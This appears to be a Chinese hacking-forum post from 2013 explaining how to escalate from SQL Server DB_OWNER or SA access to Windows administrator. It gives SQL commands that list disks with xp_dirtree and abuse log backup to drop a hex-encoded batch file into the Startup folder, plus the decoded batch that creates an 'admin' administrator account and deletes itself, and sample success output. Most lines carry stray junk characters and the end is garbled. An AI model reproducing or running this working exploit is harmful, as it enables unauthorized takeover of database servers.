找回密码
 立即注册
查看: 2487|回复: 0
打印 上一主题 下一主题

DB_OWNER.SA备份BAT到启动项提权

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-14 00:08:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
下面只给出关键的代码:
8 x) i' ~! O, g3 H- S& w使用查询分析器或者webshell连接上数据库后按如下步骤操作即可:
+ Z' G! h  n- V3 d- n; u+ P1.DB权限列目录
0 `  L6 D/ D# l+ sexec master..xp_dirtree ‘c:\’,1,1
5 b: V- t1 Y. i9 D7 A# ]$ y  r使用以上语句可以实现db权限下列出磁盘目录
3 N" K- Y/ k: a4 n; F/ n下面我们用备份的方式来备份一个BAT到启动项里
7 ^3 |  g8 M# a——————————————————————————————————————————————————————–$ Y% c9 F) P! Y2 k0 f0 D# q
alter database [abc] set RECOVERY FULL–
9 G& N! B+ K# acreate table cmd (a image)–3 [( t2 h8 _, j
backup log [abc] to disk = ‘c:\cmd1′ with init–
/ L2 g, b( C8 ]+ N- \0 j3 ]insert into cmd (a) values (0x406563686F206F66660D0A406364202577696E646972250D0A406E657420757365722061646D696E2061646D696E202F6164640D0A406E6574206C6F63616C67726F75702061646D696E6973747261746F72732061646D696E202F6164640D0A4064656C2073746172742E6261740D0A40657869740D0A400D0A)–% x6 S$ G+ K; }- I9 m1 N
backup log [abc] to disk = ‘C:\Documents and Settings\All Users\「开始」菜单\程序\启动\start.bat’–
, F3 E7 Y% N3 J4 \4 a, b" Y: idrop table cmd–9 v# {2 i' ~1 V5 D* }# b/ I3 m' b
——————————————————————————————————————————————————————–
+ O. b: \& o: v) F$ N" d$ r' X3 M上面这几条SQL语句就是备份的语句.这里要注的是:
, w1 Q- T) S, {) Y5 i3 ]. e0x6E0065007400200075007300650072002000610064006D0069006E002000610064006D0069006E0020002F006100640064002000260020006E006500740020006C006F00630061006C00670072006F00750070002000610064006D0069006E006900730074007200610074006F00720073002000610064006D0069006E0020002F00610064006400200026002000640065006C002000730074006100720074002E00640061007400 这一句HEX加密的 是我们要打的命令 下面我告诉大家这个加密码的格式怎么用/ {0 @+ U2 ~, r) r- z
编辑一个加用户ADMIN的命令 并删除START.BAT
$ ^/ G' X, T/ \5 E' F" ~@echo off7 V) m$ i9 ~8 u# F: W+ a
@cd %windir% /*这里也可以CD到SYSTEM32目录*/% O2 _3 [% c/ K6 ?/ k  I/ u
@net user admin admin /add3 Q) @* P' @- l' {' {% ?6 q! L
@net localgroup administrators admin /add5 f: E/ i5 j" \) N( ^
@del start.bat /*这一步删除了BAT文件*/
: m4 D5 ~( Y+ w  f@exit           /*这一步退出CMD*/7 m8 [1 l6 j& F% D, ^: I  B
@               /*最后这个@最好加上.要不会把你的上一句命令弄出错*/
* b# k* D3 r9 b: H( T' ]) @列数据库的命令:SELECT DB_NAME()1 P/ k+ X+ ^  k( R
我这现在连接的库是abc
* P" d5 t7 ^* d3 q/ f0 D那么我们要把备份语句中的库名换成当前库的名abc6 r+ @% s  C0 N6 z9 [( H" p
执行上面SQL语句后返回如下信息:
2 x. M% m; |( t已处理 1 页,这些页属于数据库 abc的文件 abc_Log’(位于文件 1 上)。' T' Z# ?6 x  q$ q2 |
BACKUP LOG 操作成功地处理了 1 页,花费了 0.048 秒(0.160 MB/秒)。7 o/ I( F) L& N. ?
(1 row(s) affected), j& F) k2 u; D
已处理 1 页,这些页属于数据库 abc的文件 abc_Log’(位于文件 1 上)。& q/ M  J+ h* C+ ^! s
BACKUP LOG 操作成功地处理了 1 页,花费了 0.043 秒(0.083 MB/秒)。
3 X( x  s: `6 _1 e2 [# e" ^% Y3 K说明我们备份成功了,到启动项里看看是不是多了一个bat文件,现在只等服务器重启并登陆后就会添加一个我们预先定义好的管理员账Я恕�
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表